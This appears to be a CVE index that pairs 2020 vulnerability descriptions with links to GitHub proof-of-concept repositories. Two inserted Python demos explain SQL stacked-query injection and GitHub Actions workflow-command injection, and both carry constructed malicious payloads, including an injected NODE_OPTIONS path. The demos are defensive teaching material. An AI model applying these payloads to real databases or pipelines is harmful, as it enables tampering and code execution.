Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.

- [und3sc0n0c1d0/UserEnumJira](https://github.com/und3sc0n0c1d0/UserEnumJira)
- [Rival420/CVE-2020-14181](https://github.com/Rival420/CVE-2020-14181)
- [bk-rao/CVE-2020-14181](https://github.com/bk-rao/CVE-2020-14181)

### CVE-2020-14195 (2020-06-16)

FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).

- [Al1ex/CVE-2020-14195](https://github.com/Al1ex/CVE-2020-14195)

### CVE-2020-14210 (2020-06-16)

Reflected Cross-Site Scripting (XSS) vulnerability in MONITORAPP WAF, in which script can be executed when the WAF responds with Request URL information. The product provides a function that echoes the Request URL information in its response when blocking a request.

- [monitorapp-aicc/report](https://github.com/monitorapp-aicc/report)

### CVE-2020-14292 (2020-09-09)

In the COVIDSafe application through 1.0.21 for Android, unsafe use of the Bluetooth transport option in the GATT connection allows attackers to trick the application into establishing a connection over Bluetooth BR/EDR transport, which reveals the public Bluetooth address of the victim's phone without authorisation, bypassing the Bluetooth address randomisation protection in the user's phone.

- [alwentiu/CVE-2020-14292](https://github.com/alwentiu/CVE-2020-14292)

### CVE-2020-14293 (2020-10-02)

conf_datetime in Secudos DOMOS 5.8 allows remote attackers to execute arbitrary commands as root via shell metacharacters in the zone field (obtained from the web interface).

- [patrickhener/CVE-2020-14293](https://github.com/patrickhener/CVE-2020-14293)

### CVE-2020-14294 (2020-10-02)

An issue was discovered in Secudos Qiata FTA 1.70.19. The comment feature allows persistent XSS that is executed when reading transfer comments or the global notice board.

- [patrickhener/CVE-2020-14294](https://github.com/patrickhener/CVE-2020-14294)

### CVE-2020-14295 (2020-06-17)

A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.

- [0z09e/CVE-2020-14295](https://github.com/0z09e/CVE-2020-14295)
- [mrg3ntl3m4n/CVE-2020-14295](https://github.com/mrg3ntl3m4n/CVE-2020-14295)
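The description makes a point that is easy to skim past: the injection in the filter parameter is only as bad as the database layer allows, and a driver that accepts stacked queries turns a read into a write. The following is an added example using Python's sqlite3 as a stand-in for Cacti's database layer; it is not Cacti code, and the tables, the filter parameter and the payloads are constructed for illustration. It contrasts concatenation with multi-statement execution, concatenation with single-statement execution, and a parameterised query.

```python
"""Stacked queries turn a filter-parameter injection into writes.

Added example using Python's sqlite3 as a stand-in for Cacti's database
layer; this is not Cacti code. The tables, the 'filter' parameter and the
payloads are constructed for illustration.
"""
import sqlite3

# Single-statement execution rejects a stacked query; the exception type
# differs across Python versions, so both are listed.
MULTI_STATEMENT_ERRORS = (sqlite3.Warning, sqlite3.ProgrammingError)

# Constructed payloads for the 'filter' parameter. Each closes the open
# string literal and re-opens one at the end so the final %' is still valid.
STACKED_PAYLOAD = ("'; UPDATE settings SET value = '/tmp/evil.sh' "
                   "WHERE name = 'path_php_binary'; SELECT '")
UNION_PAYLOAD = "' UNION SELECT value FROM settings WHERE 'x' LIKE '"


def make_db():
    """In-memory database: a colour table plus a settings table worth attacking."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE colors (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO colors (name) VALUES ('red'), ('green'), ('blue');
        CREATE TABLE settings (name TEXT PRIMARY KEY, value TEXT);
        INSERT INTO settings VALUES ('path_php_binary', '/usr/bin/php');
        """
    )
    return conn


def get_setting(conn, name):
    row = conn.execute("SELECT value FROM settings WHERE name = ?", (name,)).fetchone()
    return row[0]


def _concat(filter_value):
    # The injectable construction: the filter lands inside the string literal.
    return "SELECT name FROM colors WHERE name LIKE '%" + filter_value + "%'"


def search_stacked(conn, filter_value):
    """Concatenation plus a driver call that runs every statement in the string
    (executescript here, a multi-statement MySQL connection in the real
    product). Returns the SQL actually sent so callers can inspect it."""
    sql = _concat(filter_value)
    conn.executescript(sql)
    return sql


def search_concat(conn, filter_value):
    """Same concatenation, single-statement execution. A second statement is
    rejected by the driver, but the injection itself is intact: a UNION still
    reads arbitrary tables."""
    return [row[0] for row in conn.execute(_concat(filter_value))]


def search_safe(conn, filter_value):
    """Parameterised query: the filter is data, never SQL."""
    rows = conn.execute("SELECT name FROM colors WHERE name LIKE ?",
                        ("%" + filter_value + "%",))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    search_stacked(db, STACKED_PAYLOAD)
    print("after stacked injection:", get_setting(db, "path_php_binary"))

    db = make_db()
    print("UNION read via single-statement driver:", search_concat(db, UNION_PAYLOAD))
    try:
        search_concat(db, STACKED_PAYLOAD)
    except MULTI_STATEMENT_ERRORS as exc:
        print("second statement rejected:", exc)

    db = make_db()
    print("parameterised:", search_safe(db, STACKED_PAYLOAD),
          get_setting(db, "path_php_binary"))
```

Disabling multi-statement execution shrinks the blast radius (no UPDATE from a SELECT endpoint) but leaves the data exposure; only the parameterised form removes the injection.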

### CVE-2020-14321 (2022-08-16)

In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.

- [HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321)
- [lanzt/CVE-2020-14321](https://github.com/lanzt/CVE-2020-14321)
- [f0ns1/CVE-2020-14321-modified-exploit](https://github.com/f0ns1/CVE-2020-14321-modified-exploit)

### CVE-2020-14343 (2021-02-09)

A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.

- [j4k0m/loader-CVE-2020-14343](https://github.com/j4k0m/loader-CVE-2020-14343)

### CVE-2020-14356 (2020-08-19)

A null pointer dereference flaw was found in the Linux kernel cgroupv2 subsystem in versions before 5.7.10, triggered when the system is rebooted. A local user could use this flaw to crash the system or escalate their privileges on the system.

- [ShaikUsaf/linux-4.19.72_CVE-2020-14356](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-14356)

### CVE-2020-14364 (2020-08-31)

An out-of-bounds read/write access flaw was found in the USB emulator of QEMU in versions before 5.2.0. This issue occurs while processing USB packets from a guest when USBDevice 'setup_len' exceeds its 'data_buf[4096]' in the do_token_in, do_token_out routines. This flaw allows a guest user to crash the QEMU process, resulting in a denial of service, or the potential execution of arbitrary code with the privileges of the QEMU process on the host.

- [gejian-iscas/CVE-2020-14364](https://github.com/gejian-iscas/CVE-2020-14364)
- [y-f00l/CVE-2020-14364](https://github.com/y-f00l/CVE-2020-14364)

### CVE-2020-14368 (2020-12-14)

A flaw was found in Eclipse Che in versions prior to 7.14.0 that impacts CodeReady Workspaces. When configured with cookies authentication, Theia IDE doesn't properly set the SameSite value, allowing a Cross-Site Request Forgery (CSRF) and consequently allowing a cross-site WebSocket hijack on Theia IDE. This flaw allows an attacker to gain full access to the victim's workspace through the /services endpoint. To perform a successful attack, the attacker conducts a Man-in-the-middle attack (MITM) and tricks the victim into executing a request via an untrusted link, which performs the CSRF and the Socket hijack. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

- [codingchili/CVE-2020-14368](https://github.com/codingchili/CVE-2020-14368)

### CVE-2020-14372 (2021-03-03)

A flaw was found in grub2 in versions prior to 2.06, where it incorrectly enables the usage of the ACPI command when Secure Boot is enabled. This flaw allows an attacker with privileged access to craft a Secondary System Description Table (SSDT) containing code to overwrite the Linux kernel lockdown variable content directly into memory. The table is further loaded and executed by the kernel, defeating its Secure Boot lockdown and allowing the attacker to load unsigned code. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.

- [kukrimate/CVE-2020-14372](https://github.com/kukrimate/CVE-2020-14372)

### CVE-2020-14381 (2020-12-03)

A flaw was found in the Linux kernel’s futex implementation. This flaw allows a local attacker to corrupt system memory or escalate their privileges when creating a futex on a filesystem that is about to be unmounted. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

- [nanopathi/linux-4.19.72_CVE-2020-14381](https://github.com/nanopathi/linux-4.19.72_CVE-2020-14381)

### CVE-2020-14386 (2020-09-16)

A flaw was found in the Linux kernel before 5.9-rc4. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity.

- [cgwalters/cve-2020-14386](https://github.com/cgwalters/cve-2020-14386)

### CVE-2020-14644 (2020-07-15)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [0xkami/cve-2020-14644](https://github.com/0xkami/cve-2020-14644)

### CVE-2020-14645 (2020-07-15)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [Y4er/CVE-2020-14645](https://github.com/Y4er/CVE-2020-14645)
- [DaBoQuan/CVE-2020-14645](https://github.com/DaBoQuan/CVE-2020-14645)
- [ChenZIDu/CVE-2020-14645](https://github.com/ChenZIDu/CVE-2020-14645)
- [HYWZ36/CVE-2020-14645-code](https://github.com/HYWZ36/CVE-2020-14645-code)
- [Schira4396/CVE-2020-14645](https://github.com/Schira4396/CVE-2020-14645)

### CVE-2020-14750 (2020-11-01)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [pprietosanchez/CVE-2020-14750](https://github.com/pprietosanchez/CVE-2020-14750)
- [kkhacklabs/CVE-2020-14750](https://github.com/kkhacklabs/CVE-2020-14750)

### CVE-2020-14756 (2021-01-20)

Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [Y4er/CVE-2020-14756](https://github.com/Y4er/CVE-2020-14756)
- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021)

### CVE-2020-14871 (2020-10-21)

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

- [robidev/CVE-2020-14871-Exploit](https://github.com/robidev/CVE-2020-14871-Exploit)

### CVE-2020-14882 (2020-10-21)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [zhzyker/exphub](https://github.com/zhzyker/exphub)
- [jas502n/CVE-2020-14882](https://github.com/jas502n/CVE-2020-14882)
- [s1kr10s/CVE-2020-14882](https://github.com/s1kr10s/CVE-2020-14882)
- [XTeam-Wing/CVE-2020-14882](https://github.com/XTeam-Wing/CVE-2020-14882)
- [0thm4n3/cve-2020-14882](https://github.com/0thm4n3/cve-2020-14882)
- [wsfengfan/cve-2020-14882](https://github.com/wsfengfan/cve-2020-14882)
- [alexfrancow/CVE-2020-14882](https://github.com/alexfrancow/CVE-2020-14882)
- [GGyao/CVE-2020-14882_POC](https://github.com/GGyao/CVE-2020-14882_POC)
- [ludy-dev/Weblogic_Unauthorized-bypass-RCE](https://github.com/ludy-dev/Weblogic_Unauthorized-bypass-RCE)
- [GGyao/CVE-2020-14882_ALL](https://github.com/GGyao/CVE-2020-14882_ALL)
- [ovProphet/CVE-2020-14882-checker](https://github.com/ovProphet/CVE-2020-14882-checker)
- [NS-Sp4ce/CVE-2020-14882](https://github.com/NS-Sp4ce/CVE-2020-14882)
- [mmioimm/cve-2020-14882](https://github.com/mmioimm/cve-2020-14882)
- [QmF0c3UK/CVE-2020-14882](https://github.com/QmF0c3UK/CVE-2020-14882)
- [murataydemir/CVE-2020-14882](https://github.com/murataydemir/CVE-2020-14882)
- [Ormicron/CVE-2020-14882-GUI-Test](https://github.com/Ormicron/CVE-2020-14882-GUI-Test)
- [corelight/CVE-2020-14882-weblogicRCE](https://github.com/corelight/CVE-2020-14882-weblogicRCE)
- [xfiftyone/CVE-2020-14882](https://github.com/xfiftyone/CVE-2020-14882)
- [BabyTeam1024/CVE-2020-14882](https://github.com/BabyTeam1024/CVE-2020-14882)
- [adm1in/CodeTest](https://github.com/adm1in/CodeTest)
- [pwn3z/CVE-2020-14882-WebLogic](https://github.com/pwn3z/CVE-2020-14882-WebLogic)
- [milo2012/CVE-2020-14882](https://github.com/milo2012/CVE-2020-14882)
- [kk98kk0/CVE-2020-14882](https://github.com/kk98kk0/CVE-2020-14882)
- [exploitblizzard/CVE-2020-14882-WebLogic](https://github.com/exploitblizzard/CVE-2020-14882-WebLogic)
- [qianniaoge/CVE-2020-14882_Exploit_Gui](https://github.com/qianniaoge/CVE-2020-14882_Exploit_Gui)
- [N0Coriander/CVE-2020-14882-14883](https://github.com/N0Coriander/CVE-2020-14882-14883)
- [lolminerxmrig/CVE-2020-14882_ALL](https://github.com/lolminerxmrig/CVE-2020-14882_ALL)
- [nik0nz7/CVE-2020-14882](https://github.com/nik0nz7/CVE-2020-14882)
- [Danny-LLi/CVE-2020-14882](https://github.com/Danny-LLi/CVE-2020-14882)
- [LucasPDiniz/CVE-2020-14882](https://github.com/LucasPDiniz/CVE-2020-14882)
- [xMr110/CVE-2020-14882](https://github.com/xMr110/CVE-2020-14882)

### CVE-2020-14883 (2020-10-21)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

- [murataydemir/CVE-2020-14883](https://github.com/murataydemir/CVE-2020-14883)
- [B1anda0/CVE-2020-14883](https://github.com/B1anda0/CVE-2020-14883)
- [fan1029/CVE-2020-14883EXP](https://github.com/fan1029/CVE-2020-14883EXP)
- [Osyanina/westone-CVE-2020-14883-scanner](https://github.com/Osyanina/westone-CVE-2020-14883-scanner)
- [1n7erface/PocList](https://github.com/1n7erface/PocList)
- [amacloudobia/CVE-2020-14883](https://github.com/amacloudobia/CVE-2020-14883)

### CVE-2020-14947 (2020-06-30)

OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid.

- [mhaskar/CVE-2020-14947](https://github.com/mhaskar/CVE-2020-14947)

### CVE-2020-14955 (2020-06-26)

In Jiangmin Antivirus 16.0.13.129, the driver file (KVFG.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x220440.

- [intrigus-lgtm/CVE-2020-14955](https://github.com/intrigus-lgtm/CVE-2020-14955)

### CVE-2020-14965 (2020-06-23)

On TP-Link TL-WR740N v4 and TL-WR740ND v4 devices, an attacker with access to the admin panel can inject HTML code and change the HTML context of the target pages and stations in the access-control settings via targets_lists_name or hosts_lists_name. The vulnerability can also be exploited through a CSRF, requiring no authentication as an administrator.

- [g-rubert/CVE-2020-14965](https://github.com/g-rubert/CVE-2020-14965)

### CVE-2020-14974 (2020-06-23)

The driver in IOBit Unlocker 1.1.2 allows a low-privileged user to unlock a file and kill processes (even ones running as SYSTEM) that hold a handle, via IOCTL code 0x222124.

- [Aterror2be/CVE-2020-14974](https://github.com/Aterror2be/CVE-2020-14974)

### CVE-2020-15002 (2020-10-23)

OX App Suite through 7.10.3 allows SSRF via the /ajax/messaging/message message API.

- [skr0x1c0/Blind-SSRF-CVE-2020-15002](https://github.com/skr0x1c0/Blind-SSRF-CVE-2020-15002)
- [skr0x1c0/SSRF-CVE-2020-15002](https://github.com/skr0x1c0/SSRF-CVE-2020-15002)

### CVE-2020-15051 (2020-07-15)

An issue was discovered in Artica Proxy before 4.30.000000. Stored XSS exists via the Server Domain Name, Your Email Address, Group Name, MYSQL Server, Database, MYSQL Username, Group Name, and Task Description fields.

- [pratikshad19/CVE-2020-15051](https://github.com/pratikshad19/CVE-2020-15051)

### CVE-2020-15052 (2020-07-20)

An issue was discovered in Artica Proxy CE before 4.28.030.418. SQL Injection exists via the Netmask, Hostname, and Alias fields.

- [pratikshad19/CVE-2020-15052](https://github.com/pratikshad19/CVE-2020-15052)

### CVE-2020-15053 (2020-07-20)

An issue was discovered in Artica Proxy CE before 4.28.030.418. Reflected XSS exists via these search fields: real time request, System Events, Proxy Events, Proxy Objects, and Firewall objects.

- [pratikshad19/CVE-2020-15053](https://github.com/pratikshad19/CVE-2020-15053)

### CVE-2020-15148 (2020-09-15)

Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory.

- [Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses)
- [0xkami/cve-2020-15148](https://github.com/0xkami/cve-2020-15148)

### CVE-2020-15169 (2020-09-11)

In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory.

- [glasses618/CVE-2020-15169](https://github.com/glasses618/CVE-2020-15169)

### CVE-2020-15175 (2020-10-07)

In GLPI before version 9.5.2, the `​pluginimage.send.php​` endpoint allows a user to specify an image from a plugin. The parameters can be maliciously crafted to instead delete the .htaccess file for the files directory. Any user becomes able to read all the files and folders contained in “/files/”. Some of the sensitive information that is compromised are the user sessions, logs, and more. An attacker would be able to get the Administrators session token and use that to authenticate. The issue is patched in version 9.5.2.

- [Xn2/GLPwn](https://github.com/Xn2/GLPwn)

### CVE-2020-15227 (2020-10-01)

Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to a code injection attack via specially formed URL parameters that may lead to RCE. Nette is a PHP/Composer MVC Framework.

- [Langriklol/CVE-2020-15227](https://github.com/Langriklol/CVE-2020-15227)
- [hu4wufu/CVE-2020-15227](https://github.com/hu4wufu/CVE-2020-15227)
- [filipsedivy/CVE-2020-15227](https://github.com/filipsedivy/CVE-2020-15227)

### CVE-2020-15228 (2020-10-01)

In the `@actions/core` npm module before version 1.2.6, the `addPath` and `exportVariable` functions communicate with the Actions Runner over stdout by generating a string in a specific format. Workflows that log untrusted data to stdout may invoke these commands, resulting in the path or environment variables being modified without the intention of the workflow or action author. The runner will release an update that disables the `set-env` and `add-path` workflow commands in the near future. For now, users should upgrade to `@actions/core v1.2.6` or later, and replace any instance of the `set-env` or `add-path` commands in their workflows with the new Environment File Syntax. Workflows and actions using the old commands or older versions of the toolkit will start to warn, then error out during workflow execution.

- [guettli/fix-CVE-2020-15228](https://github.com/guettli/fix-CVE-2020-15228)
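The root cause above is that stdout doubled as a control channel: any line in the documented `::command::value` format was obeyed, whether the action wrote it or merely echoed attacker-controlled text. The following is an added example, a simplified simulation of the two mechanisms rather than the GitHub Actions runner's code. The command grammar (`::set-env name=NAME::VALUE`, `::add-path::DIR`, `::stop-commands::TOKEN`) and the `NAME=VALUE` environment-file format follow the public documentation; percent-escaping of values and the multi-line heredoc file form are left out, and the pull-request title and log lines are constructed.

```python
"""Workflow-command injection through stdout, and the file-based replacement.

Added example: a simplified simulation of how a CI runner turned stdout
lines into commands, not the GitHub Actions runner's code. The command
grammar and the NAME=VALUE environment-file format follow the public
documentation; percent-escaping and the heredoc form are omitted. The PR
title and log lines are constructed.
"""
import re

# "::cmd key=val,key2=val2::value"
COMMAND_RE = re.compile(
    r"^::(?P<cmd>[A-Za-z0-9_-]+)(?: (?P<props>[^:]*))?::(?P<val>.*)$")

# Constructed untrusted input: a pull-request title an attacker controls.
# A step that runs `echo "Title: $PR_TITLE"` writes the second line to stdout.
PR_TITLE = "Fix build\n::set-env name=NODE_OPTIONS::--require /tmp/evil.js"
STEP_STDOUT = ("Title: " + PR_TITLE).splitlines()


def _props(text):
    """Parse 'name=X,other=Y' into a dict."""
    out = {}
    for item in (text or "").split(","):
        if "=" in item:
            key, val = item.split("=", 1)
            out[key.strip()] = val
    return out


def process_stdout_commands(lines, env, path):
    """Old behaviour: every stdout line matching the grammar is obeyed, whoever
    produced it. Returns the resulting (env, path)."""
    env, path = dict(env), list(path)
    stop_token = None
    for line in lines:
        m = COMMAND_RE.match(line)
        if not m:
            continue
        cmd, props, val = m["cmd"], _props(m["props"]), m["val"]
        if stop_token is not None:
            if cmd == stop_token:   # "::TOKEN::" resumes command processing
                stop_token = None
            continue
        if cmd == "stop-commands":  # documented guard for logging untrusted data
            stop_token = val
        elif cmd == "set-env" and "name" in props:
            env[props["name"]] = val
        elif cmd == "add-path":
            path.insert(0, val)
    return env, path


def process_env_file(contents, env):
    """New behaviour: only NAME=VALUE lines the step appended to the file named
    by $GITHUB_ENV are applied. Stdout is never consulted, so echoing the PR
    title cannot change the environment."""
    env = dict(env)
    for line in contents.splitlines():
        if line and not line.startswith("#") and "=" in line:
            name, val = line.split("=", 1)
            env[name] = val
    return env


if __name__ == "__main__":
    env, path = process_stdout_commands(STEP_STDOUT, {"CI": "true"}, ["/usr/bin"])
    print("old runner env after echoing the title:", env)
    guarded = ["::stop-commands::a1b2c3"] + STEP_STDOUT + ["::a1b2c3::"]
    print("with stop-commands around the echo:",
          process_stdout_commands(guarded, {"CI": "true"}, [])[0])
    print("environment file:", process_env_file("BUILD_ID=42\n", {"CI": "true"}))
```

The first call shows the injected `NODE_OPTIONS` landing in the environment of later steps; wrapping untrusted output in `stop-commands` suppresses it, and the environment-file path removes the ambiguity altogether because the runner only reads what the step deliberately wrote.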

### CVE-2020-15257 (2020-12-01)

containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges. This vulnerability has been fixed in containerd 1.3.9 and 1.4.3. Users should update to these versions as soon as they are released. It should be noted that containers started with an old version of containerd-shim should be stopped and restarted, as running containers will continue to be vulnerable even after an upgrade. If you are not providing the ability for untrusted users to start containers in the same network namespace as the shim (typically the "host" network namespace, for example with docker run --net=host or hostNetwork: true in a Kubernetes pod) and run with an effective UID of 0, you are not vulnerable to this issue. If you are running containers with a vulnerable configuration, you can deny access to all abstract sockets with AppArmor by adding a line similar to deny unix addr=@**, to your policy. It is best practice to run containers with a reduced set of privileges, with a non-zero UID, and with isolated namespaces. The containerd maintainers strongly advise against sharing namespaces with the host. Reducing the set of isolation mechanisms used for a container necessarily increases that container's privilege, regardless of what container runtime is used for running that container.

- [nccgroup/abstractshimmer](https://github.com/nccgroup/abstractshimmer)

### CVE-2020-15261 (2020-10-19)

On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don't have administrative privileges, this vulnerability is only dangerous in setups that are unsafe anyway. The problem has been fixed in version 4.4.2. As a workaround, the exploitation of the vulnerability can be prevented by revoking administrative privileges from all potentially untrustworthy users.

- [yaoyao-cool/CVE-2020-15261](https://github.com/yaoyao-cool/CVE-2020-15261)

### CVE-2020-15349 (2020-11-17)

BinaryNights ForkLift 3.x before 3.4 has a local privilege escalation vulnerability because the privileged helper tool implements an XPC interface that allows any process to perform file operations (copy, move, delete) and permission changes as root.

- [Traxes/Forklift_LPE](https://github.com/Traxes/Forklift_LPE)

### CVE-2020-15367 (2020-07-07)

Venki Supravizio BPM 10.1.2 does not limit the number of authentication attempts. An unauthenticated user may exploit this vulnerability to launch a brute-force authentication attack against the Login page.

- [inflixim4be/CVE-2020-15367](https://github.com/inflixim4be/CVE-2020-15367)

### CVE-2020-15368 (2020-06-29)

AsrDrv103.sys in the ASRock RGB Driver does not properly restrict access from user space, as demonstrated by triggering a triple fault via a request to zero CR3.

- [stong/CVE-2020-15368](https://github.com/stong/CVE-2020-15368)
- [R7flex/asrockploit](https://github.com/R7flex/asrockploit)

### CVE-2020-15392 (2020-07-07)

A user enumeration vulnerability was found in Venki Supravizio BPM 10.1.2. This issue occurs during password recovery, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames.

- [inflixim4be/CVE-2020-15392](https://github.com/inflixim4be/CVE-2020-15392)

### CVE-2020-15399
- [mkelepce/CVE-2020-15399](https://github.com/mkelepce/CVE-2020-15399)

### CVE-2020-15416 (2020-07-28)

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9703.

- [k3vinlusec/R7000_httpd_BOF_CVE-2020-15416](https://github.com/k3vinlusec/R7000_httpd_BOF_CVE-2020-15416)

### CVE-2020-15436 (2020-11-23)

Use-after-free vulnerability in fs/block_dev.c in the Linux kernel before 5.8 allows local users to gain privileges or cause a denial of service by leveraging improper access to a certain error field.

- [Trinadh465/linux-4.19.72_CVE-2020-15436](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-15436)

### CVE-2020-15492 (2020-07-23)

An issue was discovered in INNEO Startup TOOLS 2017 M021 12.0.66.3784 through 2018 M040 13.0.70.3804. The sut_srv.exe web application (served on TCP port 85) includes user input into a filesystem access without any further validation. This might allow an unauthenticated attacker to read files on the server via Directory Traversal, or possibly have unspecified other impact.

- [patrickhener/CVE-2020-15492](https://github.com/patrickhener/CVE-2020-15492)

### CVE-2020-15568 (2021-01-30)

TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.

- [n0bugz/CVE-2020-15568](https://github.com/n0bugz/CVE-2020-15568)
- [divinepwner/TerraMaster-TOS-CVE-2020-15568](https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568)

### CVE-2020-15778 (2020-07-24)

scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."

